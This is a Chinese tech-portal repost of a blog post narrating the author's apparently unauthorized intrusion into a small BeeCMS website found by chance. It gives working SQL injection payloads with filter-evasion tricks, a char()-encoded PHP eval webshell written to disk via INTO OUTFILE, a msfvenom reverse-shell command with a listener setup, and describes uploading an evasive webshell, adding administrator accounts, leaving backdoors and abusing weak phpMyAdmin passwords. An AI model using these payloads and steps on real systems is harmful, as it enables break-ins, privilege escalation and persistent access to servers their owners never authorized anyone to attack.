0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

记录某一次无意点开的一个小网站的渗透过程

工程师邓生 来源:CSDN 作者:Deilty 2022-09-09 09:09 次阅读
加入交流群
微信小助手二维码

扫码添加小助手

加入工程师交流群

记录某一次无意点开的一个小网站的渗透过程,幸运的是搭建平台是phpstudy,cms是beecms,beecms有通用漏洞,然后去网上找了资料,成功getshell并获取服务器权限。

一、渗透过程

无意点开一个网站,发现网站比较小,且看起来比较老,然后发现logo没有改,于是乎去百度搜索这个cms,发现有通用漏洞,Beecms 通用漏洞

9f54549e-2fd7-11ed-ba43-dac502259ad0.png

这里运气比较好,没有更改后台地址,还是默认地址/admin/login.php

a01ba2a6-2fd7-11ed-ba43-dac502259ad0.png

通过通用漏洞发先后台管理处存在sql注入漏洞,直接输入admin’,然后就会报错,这里用万能密码不能登陆,看来还是得通过上面得通用漏洞来进行注入

a10710ba-2fd7-11ed-ba43-dac502259ad0.png

可以看到输入payload后,页面返回正常,从而可以判断有sql注入,这里采用双写进行绕过a159dd9a-2fd7-11ed-ba43-dac502259ad0.png

发现这个注入点后,就有各种各样的注入方式了,通过sql语句写入一句话,sqlmap一把梭,手工注入得到账号密码等等,怎么方便怎么来,这里我把几种方法都写一下,看看那种方法可以

方法一

1.通过post抓包sqlmap一把梭,dump出管理员账号密码,进后台找上传点

2.一把梭,发现并没有,使用脚本也没有绕过

a17de23a-2fd7-11ed-ba43-dac502259ad0.png

方法二

1.通过burp抓包,写入一句话,payload:admin%27 un union ion selselectect 1,2,3,4, into outfile 'xm.php'#,发现写入失败,前面讲到有防护,这里通过hex编码或者char函数绕过

a387b84e-2fd7-11ed-ba43-dac502259ad0.png

2.对shell部分进行编码

a3a64f52-2fd7-11ed-ba43-dac502259ad0.png

3.写入shell的payload为:注意:记得在编码转换的时候前面加0x或者直接用unhex函数,但是本次实验用unhex函数一直失败,所以在前面加0x,看到可以写入成功。

ps:这里的写入路径纯属盲猜,运气好,默认目录

a3e19148-2fd7-11ed-ba43-dac502259ad0.png

4.用蚁剑连接,成功连接,至此getshell完毕,下来就是后渗透阶段,后面会讲

a4177cea-2fd7-11ed-ba43-dac502259ad0.png

char函数绕过:mysql内置函数char()可以将里面的ascii码转换为字符串,payload为:admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#

a44b1302-2fd7-11ed-ba43-dac502259ad0.png

一样成功写入

1.写入成功后,菜刀可以连接,我们访问写入的文件,惊奇的发现竟然有admin,和一串md5码,大胆猜测可能是后台账号和密码,试一下

a49a1e7a-2fd7-11ed-ba43-dac502259ad0.png

2.md5解密,wocao,成功登陆,然后就是后台找上传了

a4b97c34-2fd7-11ed-ba43-dac502259ad0.png

二、后渗透

通过whoami查看权限,发现是admin权限,但是不是最高权限,我们要提到最高权限去

a4db327a-2fd7-11ed-ba43-dac502259ad0.png

方法一

1.通过msf生成木马提权,payload:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe

2.通过蚁剑上传木马,并执行。执行之前打开msf使用模块use exploit/multi/handler,设置相应参数,然后开始监听

a4fcc3cc-2fd7-11ed-ba43-dac502259ad0.png

3.不知道什么问题,用这个没有成功,那么只能通过大马提权了

方法二

1.上传大马,此处应该有狗或者盾之类的,用的免杀,成功上传

2.访问大马

a5226096-2fd7-11ed-ba43-dac502259ad0.png

3.这里提权方式很多,就不细说了,有大马之后很多操作都可以引刃而解了,开放端口,添加账号,留后门。。等等

4.创建admin权限账号之后,登陆服务器

a569434e-2fd7-11ed-ba43-dac502259ad0.png

三、一些其他的发现

通过扫描目录,还发现有phpmyadmin,可以爆破,这里我试了下竟然是弱口令,都是root,但是连接不上,只能通过phpmyadmin登陆,发现是低版本的phpstudy搭建的,这里就可以另一种思路,利用日志文件写入一句话getshell

a5f611de-2fd7-11ed-ba43-dac502259ad0.png

四、总结 1.前台sql注入获取用户名密码,进入后台找上传 2.SQL注入语句写入一句话 3.phpmyadmin一句话getshell 4.上传大马提权

至此,渗透结束。


审核编辑:刘清

声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • SQL
    SQL
    +关注

    关注

    1

    文章

    789

    浏览量

    46371
  • 编码
    +关注

    关注

    6

    文章

    1015

    浏览量

    56657
  • ASCII
    +关注

    关注

    5

    文章

    172

    浏览量

    36475

原文标题:实战 | 一次小网站渗透过程

文章出处:【微信号:菜鸟学信安,微信公众号:菜鸟学信安】欢迎添加关注!文章转载请注明出处。

收藏 人收藏
加入交流群
微信小助手二维码

扫码添加小助手

加入工程师交流群

    评论

    相关推荐
    热点推荐

    固定式测斜仪多久需要校准一次?

    多数工程环境下,固定式测斜仪应每12月进行一次全面校准。对于滑坡体监测、深基坑等高危场景,因位移数据直接影响预警决策,建议缩短至每6月校准一次。新设备首次安装
    的头像 发表于 08-13 14:47 553次阅读
    固定式测斜仪多久需要校准<b class='flag-5'>一次</b>?

    adxl355读数异常,三轴中某一轴数据始终为0怎么解决?

    adxl355芯片,我这边做了批设备,开始全部工作正常,后续有一次经拆装后,个别出现了三轴中某一轴读数全为0的情况,其余两轴读数正常(还有一个
    发表于 08-13 07:32

    智能客服驱动效率和体验升级,上海电信+昇腾AI的一次民生应用实践

    上海电信+昇腾AI的一次民生应用实践
    的头像 发表于 07-30 23:44 2706次阅读
    智能客服驱动效率和体验升级,上海电信+昇腾AI的<b class='flag-5'>一次</b>民生应用实践

    移动电源EMC整改:认证失败到一次通过的实战经验

    深圳南柯电子|移动电源EMC整改:认证失败到一次通过的实战经验
    的头像 发表于 05-26 11:25 573次阅读
    移动电源EMC整改:认证失败到<b class='flag-5'>一次</b>通过的实战经验

    充电桩EMC整改:测试失败到一次过检的标准化流程设计

    南柯电子|充电桩EMC整改:测试失败到一次过检的标准化流程设计
    的头像 发表于 05-09 11:19 731次阅读

    一次消谐装置与二消谐装置区别、一次消谐器与二消谐器的区别

    一次消谐器与二消谐器是电力系统中用于抑制谐振过电压的不同装置,主要区别如下: 安装位置:一次消谐器串联于电压互感器(PT)一次侧中性点与地之间,直接承受高电压;二
    的头像 发表于 05-07 09:58 3207次阅读
    <b class='flag-5'>一次</b>消谐装置与二<b class='flag-5'>次</b>消谐装置区别、<b class='flag-5'>一次</b>消谐器与二<b class='flag-5'>次</b>消谐器的区别

    一次性使用心电电极片性能测试 深圳

    一次性使用心电电极片性能测试 :YICE0196 心电电极电性能测试仪、 心电电极电性能测试仪(SEAM) 心电电极性能测试仪
    的头像 发表于 03-19 11:27 1111次阅读
    <b class='flag-5'>一次</b>性使用心电电极片性能测试 深圳<b class='flag-5'>一</b>测

    请问dlp4500选择play once点击play是每点击一次循环吗?

    dlp4500选择play once点击play是每点击一次循环吗?
    发表于 02-28 08:42

    请问DLP9000是没有VIDEO模式只能5图片一次的load吗?

    你好,想问DLP9000是没有VIDEO模式只能5图片一次的load吗 以及您能看出这个DMD是啥型号的吗 谢谢
    发表于 02-25 06:04

    欧度MEDI-SNAP一次性医用插头发布

    欧度MEDI-SNAP一次性医用插头产品组加入新成员啦!为满足一次性内窥镜、一次性手术消融刀等设备中的耗材需求,欧度将ODU MEDI-SNAP一次性医用插头的锁定方式扩展为插拔自锁和
    的头像 发表于 02-21 16:00 893次阅读

    一次消谐装置的用处以及工作原理详解

    一次消谐装置的用处以及工作原理详解     如果6-35kV电网的中性点未接地,则连接到母线上Y0的PT初级绕组将成为电网接地的金属通道,并且电网对地电容将具有通过PT初级绕组进行充电和放电
    的头像 发表于 02-10 14:17 1398次阅读

    ads8568采集基本正常,但可能在某一次上电后,出现不工作的状态,为什么?

    现在遇到这样问题:ads8568采集基本正常,但可能在某一次上电后,出现不工作的状态(busy为高),必须重新上电才能正常,CONVST、RD、CS等输入正常 说明:此AD芯片挂在fpga上,供电电压HVDD和HVSS连接+5v,-5v,与模拟电压共用 DVDD:+3.3v 数字
    发表于 02-06 08:00

    一次性锂电池为什么不能充电?文讲清!

    一次性锂电池不能充电,是由它的正负极材料、电解液等决定的。虽然它不能充电,但在某些场景下,还是有着不可替代的作用。希望通过这篇文章,能让大家对一次性锂电池有更深入的了解,以后在生活中使用的时候,也能更安全、更环保。
    的头像 发表于 01-23 14:11 2378次阅读
    <b class='flag-5'>一次</b>性锂电池为什么不能充电?<b class='flag-5'>一</b>文讲清!

    TCP三握手的详细过程

    是TCP三握手的详细过程: 1. 第一次握手:SYN(同步序列编号) 客户端 :客户端准备发起TCP连接,并向服务器发送
    的头像 发表于 01-03 17:11 1828次阅读

    调试ADS1278,读取数据过程中在下一次SYNC低脉冲信号前出现反复进入中断的现象,请问是否正确?

    准备检索变为低,我控制在DRDY下降沿进入中断读取数据(仅读取通道1),但是读取数据过程中在下一次SYNC低脉冲信号前出现反复进入中断的现象,请问是否正确?在时序上还有什么问题吗? 黄色SCLK波形
    发表于 12-25 07:03